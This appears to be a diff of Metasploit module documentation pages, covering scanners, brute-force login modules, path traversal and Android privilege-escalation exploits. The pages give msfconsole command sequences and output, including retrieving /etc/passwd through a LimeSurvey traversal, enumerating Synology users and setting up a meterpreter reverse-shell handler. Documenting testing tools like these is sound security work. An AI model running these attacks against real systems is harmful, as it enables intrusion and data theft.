||||
|
||||
ErrorLog ${APACHE_LOG_DIR}/error.log
|
||||
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
||||
|
||||
</VirtualHost>
|
||||
|
||||
Finally, execute the following commands:
|
||||
|
||||
sudo service apache2 stop
|
||||
sudo a2enmod ssl
|
||||
sudo a2enmod headers
|
||||
sudo a2ensite default-ssl
|
||||
sudo a2enconf ssl-params
|
||||
sudo apache2ctl configtest
|
||||
sudo service apache2 restart
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/http_hsts```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Apache 2.4.29 on Ubuntu 18.04 LTS
|
||||
|
||||
Install using following instructions for Ubuntu listed above.
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/http_hsts
|
||||
msf5 auxiliary(scanner/http/http_hsts) > set RHOSTS 192.168.90.91
|
||||
RHOSTS => 192.168.90.91
|
||||
msf5 auxiliary(scanner/http/http_hsts) > run
|
||||
|
||||
[+] 192.168.90.91:443 - Strict-Transport-Security:max-age=63072000; includeSubdomains
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/http/http_hsts) >
|
||||
|
||||
```
|
||||
|
||||
### Confirming using Nmap
|
||||
|
||||
```
|
||||
tekwizz123@DESKTOP-VF1AJQB:~$ nmap 192.168.90.91 -p 443 --script http-security-headers
|
||||
|
||||
Starting Nmap 7.60 ( https://nmap.org ) at 2020-03-31 00:30 CDT
|
||||
Nmap scan report for 192.168.90.91
|
||||
Host is up (0.0034s latency).
|
||||
|
||||
PORT STATE SERVICE
|
||||
443/tcp open https
|
||||
| http-security-headers:
|
||||
| Strict_Transport_Security:
|
||||
| Header: Strict-Transport-Security: max-age=63072000; includeSubdomains
|
||||
| X_Frame_Options:
|
||||
| Header: X-Frame-Options: DENY
|
||||
| Description: The browser must not display this content in any frame.
|
||||
| X_Content_Type_Options:
|
||||
| Header: X-Content-Type-Options: nosniff
|
||||
|_ Description: Will prevent the browser from MIME-sniffing a response away from the declared content-type.
|
||||
|
||||
Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
|
||||
```
|
||||
@@ -0,0 +1,43 @@
|
||||
## Vulnerable Application
|
||||
|
||||
IIS, under various conditions, may respond to a request for `/`, `/images`, or `/default.htm` with `HTTP/1.0`
|
||||
with a 300 HTTP response and a location header that contains an internal (192.x.x.x, 10.x.x.x, or 172.x.x.x)
|
||||
IP address.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install IIS with at least one IP address on a private LAN
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/http/iis_internal_ip```
|
||||
4. Do: ```set rhosts [ip]```
|
||||
5. Do: ```run```
|
||||
6. You should find the internal IP
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### IIS with SSL
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/iis_internal_ip
|
||||
msf5 auxiliary(scanner/http/iis_internal_ip) > set ssl true
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
ssl => true
|
||||
msf5 auxiliary(scanner/http/iis_internal_ip) > set rport 443
|
||||
rport => 443
|
||||
msf5 auxiliary(scanner/http/iis_internal_ip) > set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf5 auxiliary(scanner/http/iis_internal_ip) > set verbose true
|
||||
verbose => true
|
||||
rmsf5 auxiliary(scanner/http/iis_internal_ip) > run
|
||||
|
||||
[*] 2.2.2.2:443 - Requesting GET / HTTP/1.0
|
||||
[+] Location Header: https://10.1.1.20/home
|
||||
[+] Result for 2.2.2.2 found Internal IP: 10.1.1.20
|
||||
[*] 2.2.2.2:443 - Requesting GET /images HTTP/1.0
|
||||
[*] 2.2.2.2:443 - Requesting GET /default.htm HTTP/1.0
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
@@ -0,0 +1,134 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an authenticated path traversal vulnerability found in LimeSurvey versions between 4.0 and 4.1.11 with
|
||||
CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960, inclusive.
|
||||
|
||||
In CVE-2020-11455 the `getZipFile` function within the `filemanager` functionality allows for arbitrary file download. The file retrieved
|
||||
may be deleted after viewing.
|
||||
|
||||
In CVE-2019-9960 the `szip` function within the `downloadZip` functionality allows for arbitrary file download.
|
||||
|
||||
This module has been verified against the following versions:
|
||||
|
||||
* 4.1.11-200316
|
||||
* 3.15.0-181008
|
||||
* 3.9.0-180604
|
||||
* 3.6.0-180328
|
||||
* 3.0.0-171222
|
||||
* 2.70.0-170921
|
||||
|
||||
### Install
|
||||
|
||||
This application is straight forward to install. An excellent writeup is available on
|
||||
[howtoforge.com](https://www.howtoforge.com/tutorial/how-to-install-limesurvey-on-ubuntu-1804/)
|
||||
|
||||
Versions can be downloaded from [github](https://github.com/LimeSurvey/LimeSurvey/releases).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/http/limesurvey_zip_traversals```
|
||||
4. Do: ```set file [file]```
|
||||
5. Do: ```set rhosts [ip]```
|
||||
6. Do: ```run```
|
||||
7. If the file is readable, you should retrieve a file from the application
|
||||
|
||||
## Options
|
||||
|
||||
### FILE
|
||||
|
||||
The file to attempt to retrieve
|
||||
|
||||
## Scenarios
|
||||
|
||||
### LimeSurvey 4.1.11, 3.15.0, 3.9.0, 3.6.0, 3.0.0, and 2.70.0 on Ubuntu 18.04
|
||||
|
||||
```
|
||||
[*] Processing lime41.rb for ERB directives.
|
||||
resource (lime41.rb)> use auxiliary/scanner/http/limesurvey_zip_traversals
|
||||
resource (lime41.rb)> set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
resource (lime41.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (lime41.rb)> set targeturi /LimeSurvey-4.1.11-200316/
|
||||
targeturi => /LimeSurvey-4.1.11-200316/
|
||||
resource (lime41.rb)> run
|
||||
[*] CSRF: YII_CSRF_TOKEN => SzF-eUl4RW1lU0h-aFZxWmNwbGZOREJrYUduZzI1WTaGH7eqrOmgcse5liKfPNZ8qqKkvenm5Fu6oxTSyVWDrQ==
|
||||
[+] Login Successful
|
||||
[*] Version Detected: 4.1.11
|
||||
[*] Attempting to retrieve file
|
||||
[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
resource (lime41.rb)> set targeturi /LimeSurvey-3.15.0-181008/
|
||||
targeturi => /LimeSurvey-3.15.0-181008/
|
||||
resource (lime41.rb)> run
|
||||
[*] CSRF: YII_CSRF_TOKEN => SDNyc21VYXJONmIwbjFkOENmUzEyS1NMX3lPQ0VYRTJyfE0iGABAxOsuZhxGdZd59W3dNCVx2D6JABRxmu6dgw==
|
||||
[+] Login Successful
|
||||
[*] Version Detected: 3.15.0
|
||||
[*] Attempting to retrieve file
|
||||
[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
resource (lime41.rb)> set targeturi /LimeSurvey-3.9.0-180604/
|
||||
targeturi => /LimeSurvey-3.9.0-180604/
|
||||
resource (lime41.rb)> run
|
||||
[*] CSRF: YII_CSRF_TOKEN => QldPa0lZM0o0cUV-STU4NWVoYVlDdHNtYmhmVVl6NW39a1wvfep0Ccsuz_gx9V1AnMjtADnprALM7qwvxUz3Wg==
|
||||
[+] Login Successful
|
||||
[*] Version Detected: 3.9.0
|
||||
[*] Attempting to retrieve file
|
||||
[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
resource (lime41.rb)> set targeturi /LimeSurvey-3.6.0-180328/
|
||||
targeturi => /LimeSurvey-3.6.0-180328/
|
||||
resource (lime41.rb)> run
|
||||
[*] CSRF: YII_CSRF_TOKEN => SHJzSk81ak5rdWdONTJWV0VLQTlHcjRKeGNIaFlYREqfcU-BuMlPRimIHJipKDsrCF3i7j29J4bNFwxsYGD42A==
|
||||
[+] Login Successful
|
||||
[*] Version Detected: 3.6.0
|
||||
[*] Attempting to retrieve file
|
||||
[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
resource (lime41.rb)> set targeturi /LimeSurvey-3.0.0-171222/
|
||||
targeturi => /LimeSurvey-3.0.0-171222/
|
||||
resource (lime41.rb)> run
|
||||
[*] CSRF: YII_CSRF_TOKEN => T1VkbDlhYU9IbkZHel9wd0JoVVl5RTUxQ2h2Mk9yN0-AXAtaTDCOMX8gWru7EmBHPBumgY0FG0vAFLwCwyeeuA==
|
||||
[+] Login Successful
|
||||
[*] Version Detected: 3.0.0
|
||||
[*] Attempting to retrieve file
|
||||
[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
resource (lime41.rb)> set targeturi /LimeSurvey-2.70.0-170921/
|
||||
targeturi => /LimeSurvey-2.70.0-170921/
|
||||
resource (lime41.rb)> run
|
||||
[*] CSRF: YII_CSRF_TOKEN => elhvTzJaWGlJWU10WnBFajlTYmN5a1VHY1M0bDNJd1C2okYXL__0in7KMlmwY6_Iuk8sI7H7s2zQPZ5NiWW_Xg==
|
||||
[+] Login Successful
|
||||
[*] Version Detected: 2.70.0
|
||||
[*] Attempting to retrieve file
|
||||
[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
resource (lime41.rb)> md5sum ~/.msf4/loot/*
|
||||
[*] exec: md5sum ~/.msf4/loot/*
|
||||
|
||||
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
|
||||
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
|
||||
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
|
||||
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
|
||||
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
|
||||
3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
|
||||
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
|
||||
[*] exec: cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
...snip...
|
||||
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
|
||||
```
|
||||
@@ -0,0 +1,76 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to enumerate users on the Synology NAS by sending GET requests
|
||||
for the forgot password URL. The Synology NAS will respond differently if a user is
|
||||
present or not. These count as login attempts, and the default is 10 logins in 5min to
|
||||
get a permanent block. Set delay accordingly to avoid this, as default is permanent.
|
||||
|
||||
Vulnerable DSMs are:
|
||||
* DSM 6.1 < 6.1.3-15152
|
||||
* DSM 6.0 < 6.0.3-8754-4
|
||||
* DSM 5.2 < 5.2-5967-04
|
||||
|
||||
Enumeration is case insensitive.
|
||||
|
||||
To turn off Auto Block: Control Panel (Advanced Mode) > Security > Auto Block.
|
||||
|
||||
To unblock: Control Panel (Advanced Mode) > Security > Auto Block > Allow/Block List > Block List.
|
||||
|
||||
### Responses
|
||||
|
||||
The server responds with a JSON object and a 'msg' key. The values translate as:
|
||||
|
||||
* msg 1 - means user can login to GUI
|
||||
* msg 2 - means user exists but no GUI login
|
||||
* msg 3 - means feature disabled, or patched
|
||||
* msg 4 - means no user
|
||||
* msg 5 - means auto block is enabled and youre blocked. Default is 10 login attempts, and these
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/http/synology_forget_passwd_user_enum```
|
||||
4. Do: ```set rhosts [ip]```
|
||||
5. Do: ```set delay [seconds]```
|
||||
6. You should hopefully find some usernames
|
||||
|
||||
## Options
|
||||
|
||||
### Delay
|
||||
|
||||
The delay in seconds between enumeration attempts. Default lockout policy is 10 attempts in 5min,
|
||||
so this should avoid the lockout. Default is `36`.
|
||||
|
||||
### USER_LIST
|
||||
|
||||
The username list to use, defaults to `data/wordlists/unix_users.txt`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### DS412+ with DSM 5.2-5644 with auto block turned off
|
||||
|
||||
```
|
||||
[*] Processing syn_login.rb for ERB directives.
|
||||
resource (syn_login.rb)> use auxiliary/scanner/http/synology_forget_passwd_user_enum
|
||||
resource (syn_login.rb)> set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
resource (syn_login.rb)> set delay 0
|
||||
delay => 0
|
||||
resource (syn_login.rb)> run
|
||||
[+] admin - admin group
|
||||
[+] avahi - no mail or no priviege
|
||||
[+] ftp - no mail or no priviege
|
||||
[+] guest - no mail or no priviege
|
||||
[+] lp - no mail or no priviege
|
||||
[+] mysql - no mail or no priviege
|
||||
[+] nobody - no mail or no priviege
|
||||
[+] ntp - no mail or no priviege
|
||||
[+] postfix - no mail or no priviege
|
||||
[+] postgres - no mail or no priviege
|
||||
[+] root - no mail or no priviege
|
||||
[+] ROOT - no mail or no priviege
|
||||
[+] http://2.2.2.2:5000/ - Users found: ROOT, admin, avahi, ftp, guest, lp, mysql, nobody, ntp, postfix, postgres, root
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,34 @@
|
||||
## Description
|
||||
|
||||
Zen load balancer before v3.10.1 is vulnerable to authenticated directory traversal. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Vulnerable ISO](https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. `./msfconsole -q`
|
||||
2. `set RHOSTS <rhost>`
|
||||
3. `set RPORT <rport>`
|
||||
4. `set FILEPATH <filepath>`
|
||||
5. `set ssl <true/false>`
|
||||
6. `set HttpPassword <admin>`
|
||||
7. `set HttpUsername <admin>`
|
||||
5. `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/zenload_balancer_traversal
|
||||
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101
|
||||
RHOSTS => 192.168.1.101
|
||||
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true
|
||||
SSL => true
|
||||
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run
|
||||
[*] Running module against 192.168.1.101
|
||||
|
||||
[+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/http/zenload_balancer_traversal) >
|
||||
```
|
||||
@@ -11,8 +11,6 @@
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
@@ -21,7 +19,17 @@
|
||||
6. Do: ```set rport <port>```
|
||||
7. Do: ```run```
|
||||
|
||||
Example output:
|
||||
## Options
|
||||
|
||||
**The CHANNELS_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
|
||||
After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
|
||||
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_channel_brute) > run
|
||||
|
||||
@@ -35,14 +43,3 @@
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**The CHANNELS_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
|
||||
After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
## Vulnerable Application
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server
|
||||
@@ -8,7 +9,7 @@
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_enum```
|
||||
@@ -16,8 +17,16 @@
|
||||
5. Do: ```set rhosts <target_IP>```
|
||||
6. Do: ```set rport <port>```
|
||||
7. Do: ```run```
|
||||
|
||||
Example output:
|
||||
|
||||
## Options
|
||||
|
||||
### CHANNEL
|
||||
|
||||
This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
|
||||
## Scenarios
|
||||
This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
|
||||
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_enum) > run
|
||||
|
||||
@@ -26,11 +35,3 @@ msf auxiliary(scanner/misc/ibm_mq_enum) > run
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
|
||||
## Options
|
||||
**The CHANNEL option**
|
||||
|
||||
This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
|
||||
## Scenarios
|
||||
This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
|
||||
|
||||
@@ -9,8 +9,8 @@
|
||||
* Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
## Verification Steps
|
||||
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_login```
|
||||
@@ -21,7 +21,27 @@
|
||||
7. Do: ```set rport <port>```
|
||||
8. Do: ```run```
|
||||
|
||||
Example output:
|
||||
## Options
|
||||
|
||||
### USERNAMES_FILE
|
||||
|
||||
This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
|
||||
|
||||
### QUEUE_MANAGER
|
||||
|
||||
This option should contain the name of the target Queue Manager.
|
||||
|
||||
### CHANNEL
|
||||
|
||||
This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
|
||||
* ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
* ```auxiliary/scanner/misc/ibm_mq_enum```
|
||||
After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
|
||||
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_login) > run
|
||||
|
||||
@@ -33,21 +53,3 @@ msf auxiliary(scanner/misc/ibm_mq_login) > run
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
## Options
|
||||
**The USERNAMES_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
|
||||
|
||||
**The QUEUE_MANAGER option**
|
||||
|
||||
This option should contain the name of the target Queue Manager.
|
||||
|
||||
**The CHANNEL option**
|
||||
|
||||
This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
|
||||
|
||||
## Scenarios
|
||||
This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
|
||||
* ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
* ```auxiliary/scanner/misc/ibm_mq_enum```
|
||||
After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
|
||||
|
||||
@@ -0,0 +1,104 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to authenticate against an Oracle RDBMS instance using username and password
|
||||
combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. The default wordlist
|
||||
is [oracle_default_userpass.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/oracle_default_userpass.txt).
|
||||
|
||||
Default port for SQL*Net listener is 1521/tcp. If this port is open, try this module to login.
|
||||
|
||||
### Install
|
||||
|
||||
This module needs nmap 5.50 or above to function. However due to an [nmap bug](https://github.com/nmap/nmap/issues/1475) versions
|
||||
6.50-7.80 may not work.
|
||||
|
||||
```
|
||||
nmap -V
|
||||
apt-get install nmap
|
||||
```
|
||||
|
||||
In addition, if you encounter errors due to OCI libraries not being found, please see the
|
||||
[How to get Oracle Support working with Kali Linux](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).
|
||||
|
||||
For Oracle Server, please follow the following
|
||||
[guide](https://tutorialforlinux.com/2019/09/17/how-to-install-oracle-12c-r2-database-on-ubuntu-18-04-bionic-64-bit-easy-guide/).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install Oracle Database server and metasploit components
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/oracle/oracle_login```
|
||||
4. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**BLANK_PASSWORDS**
|
||||
|
||||
Try blank passwords for all users
|
||||
|
||||
**BRUTEFORCE_SPEED**
|
||||
|
||||
How fast to bruteforce, scale of 0 to 5
|
||||
|
||||
**DB_ALL_CREDS**
|
||||
|
||||
Try each user/password couple stored in the current database
|
||||
|
||||
**DB_ALL_PASS**
|
||||
|
||||
Add all passwords in the current database to the list to try
|
||||
|
||||
**DB_ALL_USERS**
|
||||
|
||||
Add all users in the current database to the list to try
|
||||
|
||||
**NMAP_VERBOSE**
|
||||
|
||||
Display nmap output
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Specify one password to use for all usernames
|
||||
|
||||
**PASS_FILE**
|
||||
|
||||
File of passwords, one per line.
|
||||
|
||||
**RHOSTS**
|
||||
|
||||
Target hosts, range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
|
||||
**RPORTS**
|
||||
|
||||
Ports of the target
|
||||
|
||||
**SID**
|
||||
|
||||
Instance (SID) to authenticate against. Default `XE`
|
||||
|
||||
**STOP_ON_SUCCESS**
|
||||
|
||||
Stop the bruteforce attack when a valid combination is found
|
||||
|
||||
**THREADS**
|
||||
|
||||
Number of concurrent threads (max of one per host)
|
||||
|
||||
**USERNAME**
|
||||
|
||||
Specific username to try for all passwords
|
||||
|
||||
**USERPASS_FILE**
|
||||
|
||||
File of username and passwords, separated by space, one set per line. Default `oracle_default_userpass.txt`
|
||||
|
||||
**USER_AS_PASS**
|
||||
|
||||
Try the username as the password for all users
|
||||
|
||||
**USER_FILE**
|
||||
|
||||
File containing usernames, one per line
|
||||
|
||||
## Scenarios
|
||||
|
||||
Unfortunately due to the nmap bug mentioned above, it was not possible to create an example run.
|
||||
@@ -0,0 +1,53 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module creates a mock POP3 server which accepts credentials.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/pop3```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Testing Script
|
||||
|
||||
The following script will attempt a login of the server.
|
||||
|
||||
```
|
||||
require 'net/pop'
|
||||
|
||||
puts 'Attempting Login'
|
||||
Net::POP3.start('127.0.0.1', 110, 'username', 'password') do |pop|
|
||||
# check for email, should be none
|
||||
if pop.mails.empty?
|
||||
puts 'No mail'
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
### Output from testing script
|
||||
|
||||
When this script is run from the Metasploit console, it intermingles with the commands.
|
||||
|
||||
```
|
||||
$ sudo ./msfconsole -qx 'use auxiliary/server/capture/pop3; set srvhost 127.0.0.1; run; ruby test_capture_pop3.rb;creds'
|
||||
srvhost => 127.0.0.1
|
||||
[*] Auxiliary module running as background job 0.
|
||||
[*] exec: ruby test_capture_pop3.rb
|
||||
|
||||
[*] Started service listener on 127.0.0.1:110
|
||||
[*] Server started.
|
||||
Attempting Login
|
||||
[+] POP3 LOGIN 127.0.0.1:35766 username / password
|
||||
No mail
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
127.0.0.1 127.0.0.1 110/tcp (pop3) username password Password
|
||||
|
||||
```
|
||||
@@ -0,0 +1,40 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This exploit module currently targets a very specific build of Android on specific set of hardware targets:
|
||||
|
||||
- Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
|
||||
|
||||
This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
|
||||
|
||||
One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
- Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
|
||||
|
||||
`msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
|
||||
|
||||
- Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
|
||||
|
||||
```
|
||||
uname -a
|
||||
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
|
||||
```
|
||||
|
||||
- Run the exploit:
|
||||
|
||||
```
|
||||
msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
|
||||
msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
|
||||
msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
|
||||
LPORT => 4448
|
||||
msf5 exploit(android/local/binder_uaf) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf5 exploit(android/local/binder_uaf) > run
|
||||
```
|
||||
|
||||
- **Verify** the new session can read and write private application data (in /data/data/..../)
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
|
||||
@@ -1,10 +1,13 @@
|
||||
## Introduction
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
|
||||
|
||||
This vulnerability was exploited by the Morris worm in 1988-11-02.
|
||||
